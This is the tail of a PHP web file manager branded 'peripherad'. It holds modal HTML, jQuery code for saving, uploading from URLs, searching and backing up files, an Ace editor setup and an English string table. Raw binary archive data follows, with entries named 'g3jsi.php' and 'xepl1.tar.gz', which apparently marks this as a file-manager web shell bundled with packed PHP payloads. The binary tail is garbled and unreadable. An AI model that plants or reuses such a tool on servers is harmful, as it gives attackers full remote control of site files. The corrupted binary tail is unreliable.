          <div class="modal-dialog" role="document">
            <form class="modal-content rounded-3 shadow <?php echo fm_get_theme(); ?>" method="post" autocomplete="off" action="<%this.action%>">
              <div class="modal-body p-4 text-center">
                <h5 class="mb-2"><?php echo lng('Are you sure want to') ?> <%this.title%> ?</h5>
                <p class="mb-1"><%this.content%></p>
              </div>
              <div class="modal-footer flex-nowrap p-0">
                <button type="button" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0 border-end" data-bs-dismiss="modal"><?php echo lng('Cancel') ?></button>
                <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                <button type="submit" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0" data-bs-dismiss="modal"><strong><?php echo lng('Okay') ?></strong></button>
              </div>
            </form>
          </div>
        </div>
    </script>

    <?php
    }


    function fm_show_footer()
    {
    ?>
</div>
<?php print_external('js-jquery'); ?>
<?php print_external('js-bootstrap'); ?>
<?php print_external('js-jquery-datatables'); ?>
<?php if (FM_USE_HIGHLIGHTJS and isset($_GET['view'])): ?>
    <?php print_external('js-highlightjs'); ?>
    <script>hljs.highlightAll(); var isHighlightingEnabled = true;</script>
<?php endif; ?>
<script>
    function template(html,options){
        var re=/<\%([^\%>]+)?\%>/g,reExp=/(^( )?(if|for|else|switch|case|break|{|}))(.*)?/g,code='var r=[];\n',cursor=0,match;var add=function(line,js){js?(code+=line.match(reExp)?line+'\n':'r.push('+line+');\n'):(code+=line!=''?'r.push("'+line.replace(/"/g,'\\"')+'");\n':'');return add}
        while(match=re.exec(html)){add(html.slice(cursor,match.index))(match[1],!0);cursor=match.index+match[0].length}
        add(html.substr(cursor,html.length-cursor));code+='return r.join("");';return new Function(code.replace(/[\r\t\n]/g,'')).apply(options)
    }
    function rename(e, t) { if(t) { $("#js-rename-from").val(t);$("#js-rename-to").val(t); $("#renameDailog").modal('show'); } }
    function change_checkboxes(e, t) { for (var n = e.length - 1; n >= 0; n--) e[n].checked = "boolean" == typeof t ? t : !e[n].checked }
    function get_checkboxes() { for (var e = document.getElementsByName("file[]"), t = [], n = e.length - 1; n >= 0; n--) (e[n].type = "checkbox") and t.push(e[n]); return t }
    function select_all() { change_checkboxes(get_checkboxes(), !0) }
    function unselect_all() { change_checkboxes(get_checkboxes(), !1) }
    function invert_all() { change_checkboxes(get_checkboxes()) }
    function checkbox_toggle() { var e = get_checkboxes(); e.push(this), change_checkboxes(e) }
    function backup(e, t) {
        var n = new XMLHttpRequest,
            a = "path=" + e + "&file=" + t + "&token="+ window.csrf +"&type=backup&ajax=true";
        return n.open("POST", "", !0), n.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), n.onreadystatechange = function () {
            4 == n.readyState and 200 == n.status and toast(n.responseText)
        }, n.send(a), !1
    }
    // Toast message
    function toast(txt) { var x = document.getElementById("snackbar");x.innerHTML=txt;x.className = "show";setTimeout(function(){ x.className = x.className.replace("show", ""); }, 3000); }
    // Save file
    function edit_save(e, t) {
        var n = "ace" == t ? editor.getSession().getValue() : document.getElementById("normal-editor").value;
        if (typeof n !== 'undefined' and n !== null) {
            if (true) {
                var data = {ajax: true, content: n, type: 'save', token: window.csrf};

                $.ajax({
                    type: "POST",
                    url: window.location,
                    data: JSON.stringify(data),
                    contentType: "application/json; charset=utf-8",
                    success: function(mes){toast("Saved Successfully"); window.onbeforeunload = function() {return}},
                    failure: function(mes) {toast("Error: try again");},
                    error: function(mes) {toast(`<p style="background-color:red">${mes.responseText}</p>`);}
                });
            } else {
                var a = document.createElement("form");
                a.setAttribute("method", "POST"), a.setAttribute("action", "");
                var o = document.createElement("textarea");
                o.setAttribute("type", "textarea"), o.setAttribute("name", "savedata");
                let cx = document.createElement("input"); cx.setAttribute("type", "hidden");cx.setAttribute("name", "token");cx.setAttribute("value", window.csrf);
                var c = document.createTextNode(n);
                o.appendChild(c), a.appendChild(o), a.appendChild(cx), document.body.appendChild(a), a.submit()
            }
        }
    }
    function show_new_pwd() { $(".js-new-pwd").toggleClass('hidden'); }
    // Save Settings
    function save_settings($this) {
        let form = $($this);
        $.ajax({
            type: form.attr('method'), url: form.attr('action'), data: form.serialize()+"&token="+ window.csrf +"&ajax="+true,
            success: function (data) {if(data) { window.location.reload();}}
        }); return false;
    }
    //Create new password hash
    function new_password_hash($this) {
        let form = $($this), $pwd = $("#js-pwd-result"); $pwd.val('');
        $.ajax({
            type: form.attr('method'), url: form.attr('action'), data: form.serialize()+"&token="+ window.csrf +"&ajax="+true,
            success: function (data) { if(data) { $pwd.val(data); } }
        }); return false;
    }
    // Upload files using URL @param {Object}
    function upload_from_url($this) {
        let form = $($this), resultWrapper = $("div#js-url-upload__list");
        $.ajax({
            type: form.attr('method'), url: form.attr('action'), data: form.serialize()+"&token="+ window.csrf +"&ajax="+true,
            beforeSend: function() { form.find("input[name=uploadurl]").attr("disabled","disabled"); form.find("button").hide(); form.find(".lds-facebook").addClass('show-me'); },
            success: function (data) {
                if(data) {
                    data = JSON.parse(data);
                    if(data.done) {
                        resultWrapper.append('<div class="alert alert-success row">Uploaded Successful: '+data.done.name+'</div>'); form.find("input[name=uploadurl]").val('');
                    } else if(data['fail']) { resultWrapper.append('<div class="alert alert-danger row">Error: '+data.fail.message+'</div>'); }
                    form.find("input[name=uploadurl]").removeAttr("disabled");form.find("button").show();form.find(".lds-facebook").removeClass('show-me');
                }
            },
            error: function(xhr) {
                form.find("input[name=uploadurl]").removeAttr("disabled");form.find("button").show();form.find(".lds-facebook").removeClass('show-me');console.error(xhr);
            }
        }); return false;
    }
    // Search template
    function search_template(data) {
        var response = "";
        $.each(data, function (key, val) {
            response += `<li><a href="?p=${val.path}&view=${val.name}">${val.path}/${val.name}</a></li>`;
        });
        return response;
    }
    // Advance search
    function fm_search() {
        var searchTxt = $("input#advanced-search").val(), searchWrapper = $("ul#search-wrapper"), path = $("#js-search-modal").attr("href"), _html = "", $loader = $("div.lds-facebook");
        if(!!searchTxt and searchTxt.length > 2 and path) {
            var data = {ajax: true, content: searchTxt, path:path, type: 'search', token: window.csrf };
            $.ajax({
                type: "POST",
                url: window.location,
                data: data,
                beforeSend: function() {
                    searchWrapper.html('');
                    $loader.addClass('show-me');
                },
                success: function(data){
                    $loader.removeClass('show-me');
                    data = JSON.parse(data);
                    if(data and data.length) {
                        _html = search_template(data);
                        searchWrapper.html(_html);
                    } else { searchWrapper.html('<p class="m-2">No result found!<p>'); }
                },
                error: function(xhr) { $loader.removeClass('show-me'); searchWrapper.html('<p class="m-2">ERROR: Try again later!</p>'); },
                failure: function(mes) { $loader.removeClass('show-me'); searchWrapper.html('<p class="m-2">ERROR: Try again later!</p>');}
            });
        } else { searchWrapper.html("OOPS: minimum 3 characters required!"); }
    }

    // action confirm dailog modal
    function confirmDailog(e, id = 0, title = "Action", content = "", action = null) {
        e.preventDefault();
        const tplObj = {id, title, content: decodeURIComponent(content.replace(/\+/g, ' ')), action};
        let tpl = $("#js-tpl-confirm").html();
        $(".modal.confirmDailog").remove();
        $('#wrapper').append(template(tpl,tplObj));
        const $confirmDailog = $("#confirmDailog-"+tplObj.id);
        $confirmDailog.modal('show');
        return false;
    }
    

    // on mouse hover image preview
    !function(s){s.previewImage=function(e){var o=s(document),t=".previewImage",a=s.extend({xOffset:20,yOffset:-20,fadeIn:"fast",css:{padding:"5px",border:"1px solid #cccccc","background-color":"#fff"},eventSelector:"[data-preview-image]",dataKey:"previewImage",overlayId:"preview-image-plugin-overlay"},e);return o.off(t),o.on("mouseover"+t,a.eventSelector,function(e){s("p#"+a.overlayId).remove();var o=s("<p>").attr("id",a.overlayId).css("position","absolute").css("display","none").append(s('<img class="c-preview-img">').attr("src",s(this).data(a.dataKey)));a.cssando.css(a.css),s("body").append(o),o.css("top",e.pageY+a.yOffset+"px").css("left",e.pageX+a.xOffset+"px").fadeIn(a.fadeIn)}),o.on("mouseout"+t,a.eventSelector,function(){s("#"+a.overlayId).remove()}),o.on("mousemove"+t,a.eventSelector,function(e){s("#"+a.overlayId).css("top",e.pageY+a.yOffset+"px").css("left",e.pageX+a.xOffset+"px")}),this},s.previewImage()}(jQuery);

    // Dom Ready Events
    $(document).ready( function () {
        // dataTable init
        var $table = $('#main-table'),
            tableLng = $table.find('th').length,
            _targets = (tableLng and tableLng == 7 ) ? [0, 4,5,6] : tableLng == 5 ? [0,4] : [3];
            mainTable = $('#main-table').DataTable({paging: false, info: false, order: [], columnDefs: [{targets: _targets, orderable: false}]
        });
        // filter table
        $('#search-addon').on( 'keyup', function () {
            mainTable.search( this.value ).draw();
        });
        $("input#advanced-search").on('keyup', function (e) {
            if (e.keyCode === 13) { fm_search(); }
        });
        $('#search-addon3').on( 'click', function () { fm_search(); });
        //upload nav tabs
        $(".fm-upload-wrapper .card-header-tabs").on("click", 'a', function(e){
            e.preventDefault();let target=$(this).data('target');
            $(".fm-upload-wrapper .card-header-tabs a").removeClass('active');$(this).addClass('active');
            $(".fm-upload-wrapper .card-tabs-container").addClass('hidden');$(target).removeClass('hidden');
        });
    });
</script>
<?php if (isset($_GET['edit']) and isset($_GET['env']) and FM_EDIT_FILE and !FM_READONLY):
        
        $ext = pathinfo($_GET["edit"], PATHINFO_EXTENSION);
        $ext =  $ext == "js" ? "javascript" :  $ext;
        ?>
    <?php print_external('js-ace'); ?>
    <script>
        var editor = ace.edit("editor");
        editor.getSession().setMode( {path:"ace/mode/<?php echo $ext; ?>", inline:true} );
        //editor.setTheme("ace/theme/twilight"); //Dark Theme
        editor.setShowPrintMargin(false); // Hide the vertical ruler
        function ace_commend (cmd) { editor.commands.exec(cmd, editor); }
        editor.commands.addCommands([{
            name: 'save', bindKey: {win: 'Ctrl-S',  mac: 'Command-S'},
            exec: function(editor) { edit_save(this, 'ace'); }
        }]);
        function renderThemeMode() {
            var $modeEl = $("select#js-ace-mode"), $themeEl = $("select#js-ace-theme"), $fontSizeEl = $("select#js-ace-fontSize"), optionNode = function(type, arr){ var $Option = ""; $.each(arr, function(i, val) { $Option += "<option value='"+type+i+"'>" + val + "</option>"; }); return $Option; },
                _data = {"aceTheme":{"bright":{"chrome":"Chrome","clouds":"Clouds","crimson_editor":"Crimson Editor","dawn":"Dawn","dreamweaver":"Dreamweaver","eclipse":"Eclipse","github":"GitHub","iplastic":"IPlastic","solarized_light":"Solarized Light","textmate":"TextMate","tomorrow":"Tomorrow","xcode":"XCode","kuroir":"Kuroir","katzenmilch":"KatzenMilch","sqlserver":"SQL Server"},"dark":{"ambiance":"Ambiance","chaos":"Chaos","clouds_midnight":"Clouds Midnight","dracula":"Dracula","cobalt":"Cobalt","gruvbox":"Gruvbox","gob":"Green on Black","idle_fingers":"idle Fingers","kr_theme":"krTheme","merbivore":"Merbivore","merbivore_soft":"Merbivore Soft","mono_industrial":"Mono Industrial","monokai":"Monokai","pastel_on_dark":"Pastel on dark","solarized_dark":"Solarized Dark","terminal":"Terminal","tomorrow_night":"Tomorrow Night","tomorrow_night_blue":"Tomorrow Night Blue","tomorrow_night_bright":"Tomorrow Night Bright","tomorrow_night_eighties":"Tomorrow Night 80s","twilight":"Twilight","vibrant_ink":"Vibrant Ink"}},"aceMode":{"javascript":"JavaScript","abap":"ABAP","abc":"ABC","actionscript":"ActionScript","ada":"ADA","apache_conf":"Apache Conf","asciidoc":"AsciiDoc","asl":"ASL","assembly_x86":"Assembly x86","autohotkey":"AutoHotKey","apex":"Apex","batchfile":"BatchFile","bro":"Bro","c_cpp":"C and C++","c9search":"C9Search","cirru":"Cirru","clojure":"Clojure","cobol":"Cobol","coffee":"CoffeeScript","coldfusion":"ColdFusion","csharp":"C#","csound_document":"Csound Document","csound_orchestra":"Csound","csound_score":"Csound Score","css":"CSS","curly":"Curly","d":"D","dart":"Dart","diff":"Diff","dockerfile":"Dockerfile","dot":"Dot","drools":"Drools","edifact":"Edifact","eiffel":"Eiffel","ejs":"EJS","elixir":"Elixir","elm":"Elm","erlang":"Erlang","forth":"Forth","fortran":"Fortran","fsharp":"FSharp","fsl":"FSL","ftl":"FreeMarker","gcode":"Gcode","gherkin":"Gherkin","gitignore":"Gitignore","glsl":"Glsl","gobstones":"Gobstones","golang":"Go","graphqlschema":"GraphQLSchema","groovy":"Groovy","haml":"HAML","handlebars":"Handlebars","haskell":"Haskell","haskell_cabal":"Haskell Cabal","haxe":"haXe","hjson":"Hjson","html":"HTML","html_elixir":"HTML (Elixir)","html_ruby":"HTML (Ruby)","ini":"INI","io":"Io","jack":"Jack","jade":"Jade","java":"Java","json":"JSON","jsoniq":"JSONiq","jsp":"JSP","jssm":"JSSM","jsx":"JSX","julia":"Julia","kotlin":"Kotlin","latex":"LaTeX","less":"LESS","liquid":"Liquid","lisp":"Lisp","livescript":"LiveScript","logiql":"LogiQL","lsl":"LSL","lua":"Lua","luapage":"LuaPage","lucene":"Lucene","makefile":"Makefile","markdown":"Markdown","mask":"Mask","matlab":"MATLAB","maze":"Maze","mel":"MEL","mixal":"MIXAL","mushcode":"MUSHCode","mysql":"MySQL","nix":"Nix","nsis":"NSIS","objectivec":"Objective-C","ocaml":"OCaml","pascal":"Pascal","perl":"Perl","perl6":"Perl 6","pgsql":"pgSQL","php_laravel_blade":"PHP (Blade Template)","php":"PHP","puppet":"Puppet","pig":"Pig","powershell":"Powershell","praat":"Praat","prolog":"Prolog","properties":"Properties","protobuf":"Protobuf","python":"Python","r":"R","razor":"Razor","rdoc":"RDoc","red":"Red","rhtml":"RHTML","rst":"RST","ruby":"Ruby","rust":"Rust","sass":"SASS","scad":"SCAD","scala":"Scala","scheme":"Scheme","scss":"SCSS","sh":"SH","sjs":"SJS","slim":"Slim","smarty":"Smarty","snippets":"snippets","soy_template":"Soy Template","space":"Space","sql":"SQL","sqlserver":"SQLServer","stylus":"Stylus","svg":"SVG","swift":"Swift","tcl":"Tcl","terraform":"Terraform","tex":"Tex","text":"Text","textile":"Textile","toml":"Toml","tsx":"TSX","twig":"Twig","typescript":"Typescript","vala":"Vala","vbscript":"VBScript","velocity":"Velocity","verilog":"Verilog","vhdl":"VHDL","visualforce":"Visualforce","wollok":"Wollok","xml":"XML","xquery":"XQuery","yaml":"YAML","django":"Django"},"fontSize":{8:8,10:10,11:11,12:12,13:13,14:14,15:15,16:16,17:17,18:18,20:20,22:22,24:24,26:26,30:30}};
            if(_data and _data.aceMode) { $modeEl.html(optionNode("ace/mode/", _data.aceMode)); }
            if(_data and _data.aceTheme) { var lightTheme = optionNode("ace/theme/", _data.aceTheme.bright), darkTheme = optionNode("ace/theme/", _data.aceTheme.dark); $themeEl.html("<optgroup label=\"Bright\">"+lightTheme+"</optgroup><optgroup label=\"Dark\">"+darkTheme+"</optgroup>");}
            if(_data and _data.fontSize) { $fontSizeEl.html(optionNode("", _data.fontSize)); }
            $modeEl.val( editor.getSession().$modeId );
            $themeEl.val( editor.getTheme() );
            $fontSizeEl.val(12).change();
        }

        $(function(){
            renderThemeMode();
            $(".js-ace-toolbar").on("click", 'button', function(e){
                e.preventDefault();
                let cmdValue = $(this).attr("data-cmd"), editorOption = $(this).attr("data-option");
                if(cmdValue and cmdValue != "none") {
                    ace_commend(cmdValue);
                } else if(editorOption) {
                    if(editorOption == "fullscreen") {
                        (void 0!==document.fullScreenElementandnull===document.fullScreenElement||void 0!==document.msFullscreenElementandnull===document.msFullscreenElement||void 0!==document.mozFullScreenand!document.mozFullScreen||void 0!==document.webkitIsFullScreenand!document.webkitIsFullScreen)
                        and(editor.container.requestFullScreen?editor.container.requestFullScreen():editor.container.mozRequestFullScreen?editor.container.mozRequestFullScreen():editor.container.webkitRequestFullScreen?editor.container.webkitRequestFullScreen(Element.ALLOW_KEYBOARD_INPUT):editor.container.msRequestFullscreenandeditor.container.msRequestFullscreen());
                    } else if(editorOption == "wrap") {
                        let wrapStatus = (editor.getSession().getUseWrapMode()) ? false : true;
                        editor.getSession().setUseWrapMode(wrapStatus);
                    }
                }
            });
            $("select#js-ace-mode, select#js-ace-theme, select#js-ace-fontSize").on("change", function(e){
                e.preventDefault();
                let selectedValue = $(this).val(), selectionType = $(this).attr("data-type");
                if(selectedValue and selectionType == "mode") {
                    editor.getSession().setMode(selectedValue);
                } else if(selectedValue and selectionType == "theme") {
                    editor.setTheme(selectedValue);
                }else if(selectedValue and selectionType == "fontSize") {
                    editor.setFontSize(parseInt(selectedValue));
                }
            });
        });
    </script>
<?php endif; ?>
<div id="snackbar"></div>
</body>
</html>
<?php
}

function lng($txt) {
    global $lang;

    $tr['en']['AppName']        = 'peripherad';      $tr['en']['AppTitle']           = 'peripherad';
    $tr['en']['Login']          = 'Sign in';                $tr['en']['Username']           = 'Username';
    $tr['en']['Password']       = 'Password';               $tr['en']['Logout']             = 'Sign Out';
    $tr['en']['Move']           = 'Move';                   $tr['en']['Copy']               = 'Copy';
    $tr['en']['Save']           = 'Save';                   $tr['en']['SelectAll']          = 'Select all';
    $tr['en']['UnSelectAll']    = 'Unselect all';           $tr['en']['File']               = 'File';
    $tr['en']['Back']           = 'Back';                   $tr['en']['Size']               = 'Size';
    $tr['en']['Perms']          = 'Perms';                  $tr['en']['Modified']           = 'Modified';
    $tr['en']['Owner']          = 'Owner';                  $tr['en']['Search']             = 'Search';
    $tr['en']['NewItem']        = 'New Item';               $tr['en']['Folder']             = 'Folder';
    $tr['en']['Delete']         = 'Delete';                 $tr['en']['Rename']             = 'Rename';
    $tr['en']['CopyTo']         = 'Copy to';                $tr['en']['DirectLink']         = 'Direct link';
    $tr['en']['UploadingFiles'] = 'Upload Files';           $tr['en']['ChangePermissions']  = 'Change Permissions';
    $tr['en']['Copying']        = 'Copying';                $tr['en']['CreateNewItem']      = 'Create New Item';
    $tr['en']['Name']           = 'Name';                   $tr['en']['AdvancedEditor']     = 'Advanced Editor';
    $tr['en']['Actions']        = 'Actions';                $tr['en']['Folder is empty']    = 'Folder is empty';
    $tr['en']['Upload']         = 'Upload';                 $tr['en']['Cancel']             = 'Cancel';
    $tr['en']['InvertSelection']= 'Invert Selection';       $tr['en']['DestinationFolder']  = 'Destination Folder';
    $tr['en']['ItemType']       = 'Item Type';              $tr['en']['ItemName']           = 'Item Name';
    $tr['en']['CreateNow']      = 'Create Now';             $tr['en']['Download']           = 'Download';
    $tr['en']['Open']           = 'Open';                   $tr['en']['UnZip']              = 'UnZip';
    $tr['en']['UnZipToFolder']  = 'UnZip to folder';        $tr['en']['Edit']               = 'Edit';
    $tr['en']['NormalEditor']   = 'Normal Editor';          $tr['en']['BackUp']             = 'Back Up';
    $tr['en']['SourceFolder']   = 'Source Folder';          $tr['en']['Files']              = 'Files';
    $tr['en']['Move']           = 'Move';                   $tr['en']['Change']             = 'Change';
    $tr['en']['Settings']       = 'Settings';               $tr['en']['Language']           = 'Language';        
    $tr['en']['ErrorReporting'] = 'Error Reporting';        $tr['en']['ShowHiddenFiles']    = 'Show Hidden Files';
    $tr['en']['Help']           = 'Help';                   $tr['en']['Created']            = 'Created';
    $tr['en']['Help Documents'] = 'Help Documents';         $tr['en']['Report Issue']       = 'Report Issue';
    $tr['en']['Generate']       = 'Generate';               $tr['en']['FullSize']           = 'Full Size';              
    $tr['en']['HideColumns']    = 'Hide Perms/Owner columns';$tr['en']['You are logged in'] = 'You are logged in';
    $tr['en']['Nothing selected']   = 'Nothing selected';   $tr['en']['Paths must be not equal']    = 'Paths must be not equal';
    $tr['en']['Renamed from']       = 'Renamed from';       $tr['en']['Archive not unpacked']       = 'Archive not unpacked';
    $tr['en']['Deleted']            = 'Deleted';            $tr['en']['Archive not created']        = 'Archive not created';
    $tr['en']['Copied from']        = 'Copied from';        $tr['en']['Permissions changed']        = 'Permissions changed';
    $tr['en']['to']                 = 'to';                 $tr['en']['Saved Successfully']         = 'Saved Successfully';
    $tr['en']['not found!']         = 'not found!';         $tr['en']['File Saved Successfully']    = 'File Saved Successfully';
    $tr['en']['Archive']            = 'Archive';            $tr['en']['Permissions not changed']    = 'Permissions not changed';
    $tr['en']['Select folder']      = 'Select folder';      $tr['en']['Source path not defined']    = 'Source path not defined';
    $tr['en']['already exists']     = 'already exists';     $tr['en']['Error while moving from']    = 'Error while moving from';
    $tr['en']['Create archive?']    = 'Create archive?';    $tr['en']['Invalid file or folder name']    = 'Invalid file or folder name';
    $tr['en']['Archive unpacked']   = 'Archive unpacked';   $tr['en']['File extension is not allowed']  = 'File extension is not allowed';
    $tr['en']['Root path']          = 'Root path';          $tr['en']['Error while renaming from']  = 'Error while renaming from';
    $tr['en']['File not found']     = 'File not found';     $tr['en']['Error while deleting items'] = 'Error while deleting items';
    $tr['en']['Moved from']         = 'Moved from';         $tr['en']['Generate new password hash'] = 'Generate new password hash';
    $tr['en']['Login failed. Invalid username or password'] = 'Login failed. Invalid username or password';
    $tr['en']['password_hash not supported, Upgrade PHP version'] = 'password_hash not supported, Upgrade PHP version';
    $tr['en']['Advanced Search']    = 'Advanced Search';    $tr['en']['Error while copying from']    = 'Error while copying from';
    $tr['en']['Invalid characters in file name']                = 'Invalid characters in file name';
    $tr['en']['FILE EXTENSION HAS NOT SUPPORTED']               = 'FILE EXTENSION HAS NOT SUPPORTED';
    $tr['en']['Selected files and folder deleted']              = 'Selected files and folder deleted';
    $tr['en']['Error while fetching archive info']              = 'Error while fetching archive info';
    $tr['en']['Delete selected files and folders?']             = 'Delete selected files and folders?';
    $tr['en']['Search file in folder and subfolders...']        = 'Search file in folder and subfolders...';
    $tr['en']['Access denied. IP restriction applicable']       = 'Access denied. IP restriction applicable';
    $tr['en']['Invalid characters in file or folder name']      = 'Invalid characters in file or folder name';
    $tr['en']['Operations with archives are not available']     = 'Operations with archives are not available';
    $tr['en']['File or folder with this path already exists']   = 'File or folder with this path already exists';

    $i18n = fm_get_translations($tr);
    $tr = $i18n ? $i18n : $tr;

    if (!strlen($lang)) $lang = 'en';
    if (isset($tr[$lang][$txt])) return fanco($tr[$lang][$txt]);
    else if (isset($tr['en'][$txt])) return fanco($tr['en'][$txt]);
    else return "$txt";
}

?>PK!��hUU�U�	g3jsi.phpnu�[���PKI��nxepl1.tar.gz000064400000122157000000000000007053 0ustar00��i{�8�0z���<�?0l�H�h�.�N;����[l'����$JbL�j��L�o�U�H��'�s�h�c
�B�P(
�Տ�S����Ϸ��ᷱ��M��o�כ���y���4����7Bˇ*�G]�߳����_+g�/�^�F��Z���2�Y6m���oO=?t0y`��]6��w�9�>�j������xne
G��H�3�������W�8�Xx׾�<:;-���ju�PR>w�����yj��td�V��Z�[�p�R=,	S:���H�|ߺ/���+X��3)�{F���l�6�{k��������W�͵~wu��2/��,��ő�m��M�{=Q��C��ZnGR�w|�z�c	h�.H�GDُ���}��;Ax��ث7����w��qm�ޚ�a't�'oBe�a�����=/�L-��J�}��pxv�}zչ8;�*|���|��ң0�vF^*�__]�w^�]F%��7��8��,�ؓ���C(o�^V�
��C��<l!�¸֯�f[���3!���L]�3��Ԡ��u�w�u�[�O���w�=	oH����Y}}��u���d����`08�=Nu�6�x�Ʊom
=o�ڼh:���ĺ�Z��Cc�N�8��N�>�>\��x�e�f�k5kS��L;���&��|�Q���2	��!�v
r�C����j�׀�
?��j5
F���	@�V�Z�Np��IC��!�!�t�.:�j���qV�&9��4Ҭ�k�b���U�3�NS?C�/�KC۟Xn�^T���A�[S&1�A�^#���A�V�'ՏA�w�W'vX�Lǵ��O��f�Yv
k0�P�U���mwפ��l;4
g�C�	�!yd�n�U~�'���?]�y���n��k����4_|���G�w�����}�䟿����ۋ��7�_�.��^��:�]Ӛx���7̽H,bk��7E	��؏A��z����|����5�uWs�nPj����j
�%e�W�a�MŠuk�X�#E�����֪���rr��B��D����5�
��������U�!#�1�X=A��slh~oa<�p�Qm�V�Ș{�j�RIrxdT��(��l�wY�@��1q־��7�~���d�im�������ϓ�������6�<?�3�a���ufo7W���Zm��n�M7�]��gmSc�D�782���ϙ���U�`��:�ce���A��F���ڿ}3����w�7�����W��u�|y�������7�g翾�]�Z��� ��9g$��[�߯�wў|Pwl_�Uz�>�uc4N��ȩoW�8HI�s�4C��P����ڞ�?	*g`���\(5���ˡ�"ԃ�KCc�Z�N��=?>�?�\��k���,���~{���d�:%ʢva<a�E�px�9h_�ʦstX��Q��V7�g���5��A�o�r3@�wb�/O`Y�:I1Z=�
�:hoE�Z�C�_��%㹑N5ZF��E3^�Eˁ48)W�����"[/vh��XW���2(DkM-��k��IX�W�XдhՂ�/i�<�K�[]�B�]�n�+QN��b�tt*��ת��>�"�FFK�)��t���F��|��Ԍb�� B��a�Z�1��#��v���i��h�%�����H|L`
��(;v��F�ΈG#֍��:��M�~�Bq�x����!G.[���c�n`�K�H�)H�����s@�u���Bɰ&}c0��B�o�#�¸���W"
�tY�	T�����}�_���;`��z#Np�/&%@~C�7��vQ��)���2F�`n���������<¿(�����6�P�Ѣ��'!�l\8$�:�b�BX;�@J)��'�͈*�/Jg gJ�BJ�ilDq}���o'�*��O�"�[�� ��k�I�,�,o̦�w�a�X�:��Ⱦ+�劫͈V��saxS{n�Ú���i@�[sd	[�;A��
�P�b^1I]����N��5
�9���� @K�rȠ���������a����LT7?���/��B\��2�>���
�v_��,ed|?��:+�}$��sm�����Fy�������tB�K��
�G탫��ߠ���><V�g��Re*����̦$�ev�^����?
i&�>��5".z.zU|�r������#�g�(
�G�ci�/���Z2NHD-Nч���,�A�Y��٫�Q>Ȳd6Y�w����a�ͺ�(�T�q��	�cF(E���\Ǟ�G���TA�W�ھ�$ 
�������S`ȣ�W��s��8�J�9ŷÙ?1bb�Z�y� ����,��!$@,\�E���
���Å��yH.�Tc��pa1:'$e\�Cz������¨��b
�Aa!���׳�~R�l���e�t��A��G�"�wn�(���V�i`��f���*^ly���bޘR��Rc��(AJ6�g",���B�#�#S'ʬ���)K���4bp��X�:Pr�{c�(�hw��u`���;D���.�h�1�@g-��O�z���J���9�r��p��S���P��a\H���V߶Շf�hu&)MVdCm���)���Qk�_"	WҟmqQ]9�Ȗ�,�ɕ��]”�>��S��}9%���/pm{Zl�퇞K�S+n=�߁e�3�/������8?�g��'TٷDU�\I�i+`e�����G�in/��Z�NN���f,w
�Z!�N�Ų�s9��\��jy8㐁�
C����r����F
�w�G9�p�VIcO�$����`dL��fS4����v:�a����蠠�%��JA�{��8�!�+������.o{.4n�U������Y߹@D�(���͚��{���Y¨�`Qʕq�ҳ�`�
"U��+�>b��ʯ+��Pcؽ����=
�~@ E4-]�?�D_Q�+�3�8Ӱ�⻦i��p�w�)���>=4S�vh��`�H5I�����E���_�,��j�4���$`�������ޮV=XCg��7��-���#(T��h#-���V}zg��»�5�F�h�nU����X��G���X���.�	3�/�=�`��5	��vMzt��.���q�%#�Y.~j�O�T2���"?�@}��kN����5�b9ilԍMh�[7*H�����n��&K��d���G��
K��/r�
��l&�H�@���W�1"��:���,�h67
�� �d�n�?[�F�o
[џJ��Ͻ�ƶ��*����������zӨ@�n���pU\T
5����џ�VÈ��o#Xl4�!}Cנ�[�ڶ��Cm�3��w��w���7�L_����r9Pf����k��e�?��&����4��-#�?%��,o�Oc�H���%67��Y���6\VС�Z�̳��e�K�8��B>G.-�G
e�
���#́�#'N�j��7j�RyG��(�~�lg<���Qs2iӦ5�V�
�H�{˵�B�Q��/S!9N��f�j**�D�皆ӏ��7�s�l�ԃ�כK��S�Ks�z��@U���S���(Ko��=z�ҶEs_Յ�ʴ���P�r]�rg�&u�(�y�	;�mf�b�}tw��|a���؉�X7��_%�1�>w]�wm������5`υ����6�ش�-,�S��*��}VÁ0oy3���R�
<uKL^�a%���y�{�z^���>HU�-Vs�&g'צ2{���[�Ъ�ΰ�`�n�ہU��,Rr��.<887�}V��1�}V��?�lY�t��4PB�z]�C�Ĉx���������b*�ky�w�����64ћ�A%���������C�㤲Q��Y��|�zC����Eȁ."5���������J0c�S����U���<�����ԗ?L��B���M�O(�h&�0�w_�����~�>:<l���#�oІ��Yrc��T��^�w[�K�r���W�����!�d�,����i�z�>��Gɢ��h�՟I��ރِS$ةS&I��_���;GW��h�ky�'�&?dA�H�
�x�r�OvQ=�RBWS�h�t��i_�p�>AC�c/1����0_�\��%E���*-'EX�h�m���D}�D�.;�a�j<hkF��1�D�K�
�����e<�3L̸��|�{��j��IC�@ŒQ��]�ݛ�b��D��A����\A§by�:�3��f�F*J����4��4ʍ���2��
U*E�@���S�>*�>�jOv���Ǘm"[2O`��Rl��N�x‡�c��-�ڤצ<�DW��lw�߲ol{L��><����i��9:8;}�9:={�i��FO�;nkǥ�`�����c���素H~Gg�,a���sy��+	3���9����W��6�%��_��G�;�[9��x��ZLEwd*��,$���[���'/�6��5;�LJRSڞ->YxO�m�0ߋZ�Z7��
��z�'��lv��h�M2�^5S�P��\'žmr�.,�l��Lս���I�9ա�Q+�MBDt0��}���5)&D�.���G��"
�$q�]�`&�b�� Q�8�=�D\z�|Y��F%�뽙�Q��)+L�F�Q�Ҍ��
��a����xf��N#ִ*|Jc����J�ys���~���YH\���D_����l���*v��݈K	��H0��8L)rb	�=���Ve+�%Š���N�]�	��g�+���*eS�_+�^^V`���]�^H+:�n���r�b�k\i�F�K�J>T��[�k(歩TN���
�A���@�~Y�Mك�^@9R������)cra�C��w�7.mĪ��.3�]F��}�z���bT�+�?vvv�f��N`�9S3��"�&ӵz׳)I��⅁0mZ�|��<A}uj�5�L-���u��b��Q��80��S �]+tn�C���pɑ��W�*�/53C��u២�?���v�c'��˘F[P�K�3�R�Z�f�>�of0��/��Ќ)/��{�O��4%?��z��p�Nxʬ}׳�t��$y%�#�])���F�jYH��J�ӣ�l/���1ة����(�}H�V6t���7�,��y
